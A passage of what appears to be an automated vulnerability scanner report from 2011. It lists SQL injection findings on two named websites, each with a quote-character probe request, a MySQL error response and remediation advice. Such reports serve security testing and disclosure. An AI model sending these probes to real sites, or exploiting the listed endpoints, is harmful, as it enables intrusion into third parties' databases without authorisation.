Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:12:40 GMT
Connection: Keep-Alive
Content-Length: 27720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:12:41 GMT
Connection: Keep-Alive
Content-Length: 29451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

2.53. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /financing'/index.php HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:16:42 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; path=/
Content-Length: 27703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

2.54. http://www.millerwelds.com/financing/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /financing/index.php' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:17:06 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B8515BBB2946B5A0577F4A036E8F8BD5; path=/
Content-Length: 27724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/index.php''' at line 1)<br>
...[SNIP]...

2.55. http://www.millerwelds.com/financing/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/index.php?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:15:50 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; path=/
Content-Length: 13812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/index.php?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:15:51 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B0FC82155C2EC3F1BBBD167B0997AEA7; path=/
Content-Length: 15555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

2.56. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-bootm-bg.jpg?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:06 GMT
Connection: Keep-Alive
Content-Length: 27711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

2.57. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-bootm-bg.jpg'?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:30 GMT
Connection: Keep-Alive
Content-Length: 27710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

2.58. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-top-bg.jpg?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:09 GMT
Connection: Keep-Alive
Content-Length: 27709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

2.59. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-top-bg.jpg'?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:34 GMT
Connection: Keep-Alive
Content-Length: 27708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

2.60. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/header-background.jpg?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:34 GMT
Connection: Keep-Alive
Content-Length: 27713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

2.61. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/header-background.jpg'?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:58 GMT
Connection: Keep-Alive
Content-Length: 27712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

2.62. http://www.nutter.com/attorneys.php [AttorneyID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /attorneys.php

Issue detail

The AttorneyID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AttorneyID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.php?AttorneyID=59' HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/attorneys.php?letter=G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:15:26 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 9631

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELECT FirstName,LastName,Mid
...[SNIP]...

2.63. http://www.nutter.com/careers.php [CareerID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CareerID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CareerID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=22&CareerID=4'&subID=1 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:19:42 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 8510

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<div id="mainContent">
   
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

2.64. http://www.nutter.com/careers.php [CategoryID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=22'&CareerID=4&subID=1 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:18:45 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 17285

